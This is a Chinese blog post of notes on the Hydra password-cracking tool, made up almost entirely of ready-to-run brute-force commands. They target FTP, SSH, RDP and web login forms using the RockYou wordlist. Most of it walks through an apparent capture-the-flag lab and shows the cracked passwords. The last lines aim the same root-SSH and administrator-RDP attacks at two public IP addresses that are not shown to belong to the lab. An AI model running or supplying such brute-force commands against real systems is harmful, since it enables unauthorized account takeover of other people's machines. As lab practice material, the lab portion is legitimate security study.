hydra实例操作

***** 参考视频byy3.com blog
https://www
1,启动机器
2, hydra —— hydra -l user -P passlist.txt ftp://192.168.0.1
SSH —— hydra -l <username> -P <full path to pass> <ip> -t 4 ssh
Post Web Form—— hydra -l -P http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

题目1 web password flag1
If you've tried more than 30 passwords from RockYou.txt, you are doing something wrong! 提示使用RockYou.txt
**************************注意命令是再>上面执行 (所以先hydra然后进入>命令行执行命令)
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.238.100 http-post-form "/login:username="^USER^&password=^PASS^:incorrect" -f

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.157.227 http-post-form "/login:username=^USER^&password=^PASS^:incorrect" 找到密码 sunshine 得到flag1
***大写的-L 表示也要list用户名

问题2 找到flag2
SSH# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.157.227 ssh
22][ssh] host: 10.10.157.227 login: molly password: butterfly

locate rockyou
gunzip /usr/share/wordlists/rockyou.txt.gz
hydra -l root -P /usr/share/wordlists/rockyou.txt 144.217.124.18 ssh

hydra -l administrator -P /usr/share/wordlists/rockyou.txt 5.135.39.185 rdp -v

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud

您是第8237469 位访客, 您的IP是:[3.235.105.97]